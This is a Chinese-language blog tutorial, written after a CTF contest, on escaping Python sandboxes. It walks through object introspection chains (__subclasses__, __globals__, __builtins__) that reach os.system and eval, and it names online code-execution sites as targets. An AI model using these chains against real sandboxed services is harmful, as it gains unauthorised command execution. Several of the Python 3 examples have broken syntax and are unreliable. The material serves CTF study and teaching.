<!DOCTYPE html>
<html lang="zh-Hans">
    <!-- title -->




<!-- keywords -->




<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Ethan">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Ethan">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="一花一世界，一木一森林">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <title>python 沙盒逃逸 · Ethan&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href="/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="stylesheet" href="/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href="/assets/ethan.ico">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/">Ethan&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">python 沙盒逃逸</a>
            </div>
    </div>
    
    <a class="home-link" href="/">Ethan's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            python 沙盒逃逸
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class="post-intro-tags">
    
        <a class="post-tag" href="javascript:void(0);" data-tags="python">python</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">4.6k</span>阅读时长: <span class="post-count reading-time">19 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/10/04</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <h5 id="题记："><a href="#题记：" class="headerlink" title="题记："></a>题记：</h5><p>闲来无事，加上之前第十一届全国大学生信息安全竞赛创新能力实践赛线下赛的时候，碰见过python沙盒的题目，于是乎想深入了解一下，故有此篇！<br><a id="more"></a></p>
<h4 id="基础知识："><a href="#基础知识：" class="headerlink" title="基础知识："></a><strong>基础知识：</strong></h4><h5 id="沙箱："><a href="#沙箱：" class="headerlink" title="沙箱："></a><strong>沙箱：</strong></h5><p>沙箱是一种按照安全策略限制程序行为的执行环境。早期主要用于测试可疑软件等，比如黑客们为了试用某种病毒或者不安全产品，往往可以将它们在沙箱环境中运行。<br>　　经典的沙箱系统的实现途径一般是通过拦截系统调用，监视程序行为，然后依据用户定义的策略来控制和限制程序对计算机资源的使用，比如改写注册表，读写磁盘等。</p>
<p>沙箱逃逸,就是在给我们的一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程。其实就是闯过重重黑名单，最终拿到系统命令执行权限的过程。</p>
<h5 id="内建名称空间-builtins"><a href="#内建名称空间-builtins" class="headerlink" title="内建名称空间 builtins"></a><strong>内建名称空间 <strong>builtins</strong></strong></h5><p>​    在启动Python解释器之后，即使没有创建任何的变量或者函数，还是会有许多函数可以使用，这些函数就是内建函数，并不需要我们自己做定义，而是在启动python解释器的时候，就已经导入到内存中供我们使用，想要了解这里面的工作原理，我们可以从名称空间开始<br>​    名称空间在python是个非常重要的概念，它是从名称到对象的映射，而在python程序的执行过程中，至少会存在两个名称空间</p>
<ul>
<li>内建名称空间</li>
<li>全局名称空间</li>
</ul>
<p>这里我们主要关注的是内建名称空间，是名字到内建对象的映射，，在python中，初始的<strong>builtins</strong>模块提供内建名称空间到内建对象的映射<br>dir()函数用于向我们展示一个对象的属性有哪些，在没有提供对象的时候，将会提供当前环境所导入的所有模块，我们可以看到初始模块有哪些.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`&gt;&gt;&gt; dir()[<span class="string">'__builtins__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__name__'</span>, <span class="string">'__package__'</span>]&gt;&gt;&gt; <span class="keyword">import</span> os&gt;&gt;&gt; dir()[<span class="string">'__builtins__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__name__'</span>, <span class="string">'__package__'</span>, <span class="string">'base64'</span>, <span class="string">'os'</span>]`</span><br></pre></td></tr></table></figure>
<p>这里面，我们可以看到<code>__builtins__</code>是做为默认初始模块出现的，那么用dir()命令看看<code>__builtins__</code>的成分</p>
<p><img src="https://bkog.oss-cn-shenzhen.aliyuncs.com/picture/MiW2Qf.png" alt></p>
<p>从里面我们可以看到一些我们经常用到的函数：open(),eval(),len(),<code>__import__</code>,以及我们刚才用的dir()函数，还有我们要用的一些对象诸如list,dict,tuple,int,float这些，然后还有一些异常啥的。当然，这里面最关键的就是<code>__import__</code>了，可以使用import函数的话，就可以导入任意模块了。</p>
<p>python中的类继承，两个魔术方法，全局变量</p>
<p><strong>类继承</strong></p>
<p> python中对一个变量应用<code>__class__</code>方法从一个变量实例转到对应的对象类型后，类有以下三种关于继承关系的方法</p>
<ul>
<li><p><code>__base__</code>  对象的一个基类，一般情况下是object，有时不是，这时需要使用下一个方法</p>
</li>
<li><p><code>__mro__</code> 同样可以获取对象的基类，只是这时会显示出整个继承链的关系，是一个列表，object在最底层故在列表中的最后，通过<code>__mro__[-1]</code>可以获取到</p>
</li>
<li><p><code>__subclasses__()</code>  继承此对象的子类，返回一个列表</p>
</li>
</ul>
<p> 有这些类继承的方法，我们就可以从任何一个变量，顺藤摸瓜到基类中去，再获得到此基类所有实现的类，就可以获得到很多的类啦，当然，这些类还只是直接继承object的，如果我们顺着子类往下摸说不定还能找到更多</p>
<p>python中一切均为对象，均继承object对象，python的object类中集成了很多的基础函数，我们想要调用的时候也是需要用object去操作的，总结了两种创建object的方法如下(还有更多)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[].__class__.__bases__[<span class="number">0</span>]</span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>]  </span><br><span class="line"></span><br><span class="line">&gt;&gt;&gt;[].__class__.__bases__[<span class="number">0</span>] </span><br><span class="line">&lt;type <span class="string">'object'</span>&gt; </span><br><span class="line">&gt;&gt;&gt;<span class="string">''</span>.__class__.__mro__[<span class="number">-1</span>] </span><br><span class="line">&lt;type <span class="string">'object'</span>&gt;</span><br></pre></td></tr></table></figure>
<h5 id="两个魔术方法"><a href="#两个魔术方法" class="headerlink" title="两个魔术方法"></a><strong>两个魔术方法</strong></h5><p>第一个是类具有的——<code>__dict__</code>魔术方法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 首先使用dir看下[]里支持的方法，属性等</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>dir([])</span><br><span class="line">[<span class="string">'__add__'</span>,.....省略..... <span class="string">'__subclasshook__'</span>, <span class="string">'append'</span>, <span class="string">'count'</span>, <span class="string">'extend'</span>, <span class="string">'index'</span>, <span class="string">'insert'</span>, <span class="string">'pop'</span>, <span class="string">'remove'</span>, <span class="string">'reverse'</span>, <span class="string">'sort'</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 在将[]实例转化为class类型后，我们就可以使用class这个类的__dict__方法，以字典的格式列出来这个类中所支持的方法，属性</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__dict__</span><br><span class="line">dict_proxy(&#123;<span class="string">'__getslice__'</span>: &lt;slot wrapper <span class="string">'__getslice__'</span> of <span class="string">'list'</span> objects&gt;, <span class="string">'__getattribute__'</span>: &lt;slot wrapper <span class="string">'__getattribute__'</span> of <span class="string">'list'</span> objects&gt;, <span class="string">'pop'</span>: &lt;method <span class="string">'pop'</span> of <span class="string">'list'</span> objects&gt;, <span class="string">'remove'</span>: &lt;method <span class="string">'remove'</span> of <span class="string">'list'</span> objects&gt;, .......省略...... <span class="string">'__hash__'</span>: <span class="literal">None</span>, <span class="string">'__ge__'</span>: &lt;slot wrapper <span class="string">'__ge__'</span> of <span class="string">'list'</span> objects&gt;&#125;)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 通过__dict__来间接选用append方法</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__dict__[<span class="string">'append'</span>]</span><br><span class="line">&lt;method <span class="string">'append'</span> of <span class="string">'list'</span> objects&gt;</span><br><span class="line"><span class="comment"># 然后尝试调用，第一个对应append方法的实例对象，第二个为方法的参数（哎，和java的反射好像啊，莫非这就是反射？）</span></span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>a = []</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span>[].__class__.__dict__[<span class="string">'append'</span>](a, <span class="string">'firstEle'</span>)</span><br><span class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">print</span> a</span><br><span class="line">[<span class="string">'firstEle'</span>]</span><br></pre></td></tr></table></figure>
<p>第二个是实例、类、函数都具有的——<code>__getattribute__</code>魔术方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"># 通过dir()看下实例，类，函数里的情况，都能看到__getattribute这个魔术方法的存在</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; dir([])               #实例</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; dir([].__class__)     #类</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; dir([].append)        #函数</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">先介绍在函数中的应用吧，这个魔术方法的绕过作用经常在函数中用到</span><br><span class="line"></span><br><span class="line">\# 首先定位到一个函数上</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[72]            #定位到类</span><br><span class="line"></span><br><span class="line">&lt;class &apos;site._Printer&apos;&gt;</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[72].__init__   #定位到__init__函数</span><br><span class="line"></span><br><span class="line">&lt;unbound method _Printer.__init__&gt;</span><br><span class="line"></span><br><span class="line">\# 还是用dir看下函数里支持的内容，可以看到__getattribute__这个方法是支持的，另外多嘴一句：</span><br><span class="line"></span><br><span class="line">\# 怎么看一个东西是函数，是对象呢，函数中总会支持__call__方法，而对象没有，可以通过这点来判断</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; dir([].__class__.__base__.__subclasses__()[72].__init__)</span><br><span class="line"></span><br><span class="line">[&apos;__call__&apos;, &apos;__class__&apos;, &apos;__cmp__&apos;, &apos;__delattr__&apos;, &apos;__doc__&apos;, &apos;__format__&apos;, &apos;__func__&apos;, &apos;__get__&apos;, &apos;__getattribute__&apos;, &apos;__hash__&apos;, &apos;__init__&apos;, &apos;__new__&apos;, &apos;__reduce__&apos;, &apos;__reduce_ex__&apos;, &apos;__repr__&apos;, &apos;__self__&apos;, &apos;__setattr__&apos;, &apos;__sizeof__&apos;, &apos;__str__&apos;, &apos;__subclasshook__&apos;, &apos;im_class&apos;, &apos;im_func&apos;, &apos;im_self&apos;]</span><br><span class="line"></span><br><span class="line">\# 通过__getattribute__方法，我们可以获得到函数中所支持的所有属性,当然目的就是要调用__init__函数中的__globals__啦</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[72].__init__.__getattribute__(&apos;__globals__&apos;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">然后介绍在实例中的应用</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; a = []</span><br><span class="line"></span><br><span class="line">\# 这里做个小对比，第一个是a的append方法，所以显示是个内建方法，第二个是list类的append所以显示的与前一个不同，第二个在调用的时候还需要指定好调用这个方法的对象</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; a.__getattribute__(&apos;append&apos;)    </span><br><span class="line"></span><br><span class="line">&lt;built-in method append of list object at 0x057D93F0&gt;</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; a.__class__.append</span><br><span class="line"></span><br><span class="line">&lt;method &apos;append&apos; of &apos;list&apos; objects&gt;</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; a.__getattribute__(&apos;append&apos;)(&apos;firstEle&apos;)</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; a.__class__.append(a,&apos;secondEle&apos;)</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; print a</span><br><span class="line"></span><br><span class="line">[&apos;firstEle&apos;, &apos;secondEle&apos;]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">最后介绍在类中的应用，其实还是实例上的应用，其产生的结果与__dict__不同,目前感觉用处不大</span><br><span class="line"></span><br><span class="line">\# 首先测试使用__dict__调用[].__class__的__init__方法</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; [].__class__.__dict__[&apos;__init__&apos;]</span><br><span class="line"></span><br><span class="line">&lt;slot wrapper &apos;__init__&apos; of &apos;list&apos; objects&gt;</span><br><span class="line"></span><br><span class="line">\# 再测试使用__getattribute__调用[].__class__的__init__方法</span><br><span class="line"></span><br><span class="line">\&gt;&gt;&gt; [].__class__.__getattribute__([],&apos;__init__&apos;)</span><br><span class="line"></span><br><span class="line">&lt;method-wrapper &apos;__init__&apos; of list object at 0x057D44B8&gt;</span><br><span class="line"></span><br><span class="line">可以看到第一个返回的是个方法，第二个返回一个实例空间的方法，实际我们在调用</span><br><span class="line"></span><br><span class="line">[].__class__.__base__.__subclasses__()[72].__init__.__globals__[&apos;os&apos;]</span><br><span class="line"></span><br><span class="line">的时候，只有第一种方法获得的init，也就是&lt;slot wrapper &apos;__init__&apos; of &apos;list&apos; objects&gt;类型的__init__，才具有__globals</span><br></pre></td></tr></table></figure>
<p>了解上面这些是有些用处的，沙盒逃逸中有个很重要的方法就是：从变量-&gt;对象-&gt;基类-&gt;子类遍历-&gt;全局变量  这个流程中，找到我们想要的模块或者函数，而上面的叙述一个是为了讲清为什么要用这个流程，另一方面就是介绍了两种魔术方法，能够以字符串的形式调用属性，提供了一些字符绕过的可能</p>
<h5 id="补充："><a href="#补充：" class="headerlink" title="补充："></a><strong>补充：</strong></h5><p><strong><strong>globals</strong>:</strong><br>​    该属性是函数特有的属性,记录当前文件全局变量的值,如果某个文件调用了os、sys等库,但我们只能访问该文件某个函数或者某个对象，那么我们就可以利用<strong>globals</strong>属性访问全局的变量</p>
<p>关于全局变量解释代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">a = <span class="keyword">lambda</span> x:x+<span class="number">1</span> <span class="comment">#定义一个匿名函数</span></span><br><span class="line">dir(a)</span><br><span class="line">[<span class="string">'__call__'</span>, <span class="string">'__class__'</span>, <span class="string">'__closure__'</span>, <span class="string">'__code__'</span>, <span class="string">'__defaults__'</span>, <span class="string">'__delattr__'</span>, <span class="string">'__dict__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__format__'</span>, <span class="string">'__get__'</span>, <span class="string">'__getattribute__'</span>, <span class="string">'__globals__'</span>, <span class="string">'__hash__'</span>, <span class="string">'__init__'</span>, <span class="string">'__module__'</span>, <span class="string">'__name__'</span>, <span class="string">'__new__'</span>, <span class="string">'__reduce__'</span>, <span class="string">'__reduce_ex__'</span>, <span class="string">'__repr__'</span>, <span class="string">'__setattr__'</span>, <span class="string">'__sizeof__'</span>, <span class="string">'__str__'</span>, <span class="string">'__subclasshook__'</span>, <span class="string">'func_closure'</span>, <span class="string">'func_code'</span>, <span class="string">'func_defaults'</span>, <span class="string">'func_dict'</span>, <span class="string">'func_doc'</span>, <span class="string">'func_globals'</span>, <span class="string">'func_name'</span>]</span><br><span class="line">a.__globals__</span><br><span class="line">&#123;<span class="string">'__builtins__'</span>: &lt;module <span class="string">'__builtin__'</span> (built-<span class="keyword">in</span>)&gt;, <span class="string">'__name__'</span>: <span class="string">'__main__'</span>, <span class="string">'__doc__'</span>: <span class="literal">None</span>, <span class="string">'a'</span>: &lt;function &lt;<span class="keyword">lambda</span>&gt; at <span class="number">0x7fcd7601ccf8</span>&gt;, <span class="string">'__package__'</span>: <span class="literal">None</span>&#125;</span><br><span class="line">a.func_globals</span><br><span class="line">&#123;<span class="string">'__builtins__'</span>: &lt;module <span class="string">'__builtin__'</span> (built-<span class="keyword">in</span>)&gt;, <span class="string">'__name__'</span>: <span class="string">'__main__'</span>, <span class="string">'__doc__'</span>: <span class="literal">None</span>, <span class="string">'a'</span>: &lt;function &lt;<span class="keyword">lambda</span>&gt; at <span class="number">0x7f1095d72cf8</span>&gt;, <span class="string">'__package__'</span>: <span class="literal">None</span>&#125;</span><br><span class="line">(<span class="keyword">lambda</span> x:<span class="number">1</span>).__globals__[<span class="string">'__builtins__'</span>].eval(<span class="string">"__import__('os').system('ls')"</span>)</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">`[].__class__.__base__.__subclasses__()[<span class="number">72</span>].__init__.__globals__[<span class="string">'os'</span>]`</span><br><span class="line"> [].__class__.__base__.__subclasses__()[<span class="number">72</span>].__init__.__globals__[<span class="string">'os'</span>].system(<span class="string">'dir'</span>)</span><br><span class="line"><span class="comment">#下面也是可以执行任意命令,这里就不一一阐述了,道理类似 </span></span><br><span class="line">[].__class__.__base__.__subclasses__()[<span class="number">72</span>].__init__.__globals__[<span class="string">'os'</span>].popen(<span class="string">'dir'</span>) [].__class__.__base__.__subclasses__([<span class="number">59</span>].__init__.__globals__[<span class="string">'linecache'</span>].__dict__[<span class="string">'os'</span>].system(<span class="string">'ls'</span>) [].__class__.__base__.__subclasses__([<span class="number">59</span>].__init__.func_globals[<span class="string">'linecache'</span>].__dict__.values()[<span class="number">12</span>].system(<span class="string">'ls'</span>) </span><br><span class="line"><span class="comment">#python3 </span></span><br><span class="line"><span class="string">''</span>.__class__.__mro__[<span class="number">2</span>].__subclasses__([<span class="number">59</span>].__init__.func_globals.values()[<span class="number">13</span>][<span class="string">'eval'</span>] <span class="string">""</span>.__class__.__mro__[<span class="number">-1</span>].__subclasses__([<span class="number">117</span>].__init__.__globals__[<span class="string">'__builtins__'</span>][<span class="string">'eval'</span>]</span><br></pre></td></tr></table></figure>
<h4 id="常见的实战应用场景"><a href="#常见的实战应用场景" class="headerlink" title="常见的实战应用场景"></a><strong>常见的实战应用场景</strong></h4><h5 id="直接的代码环境"><a href="#直接的代码环境" class="headerlink" title="直接的代码环境"></a><strong>直接的代码环境</strong></h5><p> 常见的就是各种提供在线代码运行的网站,还有一些虚拟环境,以及一些编程练习网站,这种来说一般过滤较少,很容易渗透,但是getshell之后会相当麻烦,大多数情况下这类网站的虚拟机不仅与物理系统做了隔离还删除了很多内网渗透时实用的工具比如ifconfig之类的,后渗透工作相当的费工夫</p>
